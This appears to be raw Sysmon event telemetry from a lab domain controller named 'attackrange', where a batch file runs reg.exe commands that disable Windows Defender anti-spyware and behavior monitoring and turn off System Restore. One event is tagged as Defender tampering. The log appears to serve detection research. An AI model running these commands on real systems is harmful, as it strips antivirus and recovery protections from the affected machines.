12:04:38.771{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.783{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1089,Tamper-DefenderSetValue2021-03-31 12:04:38.771{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpywareDWORD (0x00000001) 10341000x80000000000000009202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.775{266CAFBE-6556-6064-2B01-00000000AE01}6344C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.756{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSRDWORD (0x00000001) 10341000x80000000000000009193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.764{266CAFBE-6556-6064-2A01-00000000AE01}4172C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.756{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableConfigDWORD (0x00000001) 10341000x80000000000000009184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.756{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.754{266CAFBE-6556-6064-2901-00000000AE01}6592C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.740{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSRDWORD (0x00000001) 10341000x80000000000000009175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2801-00000000AE01}6112C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9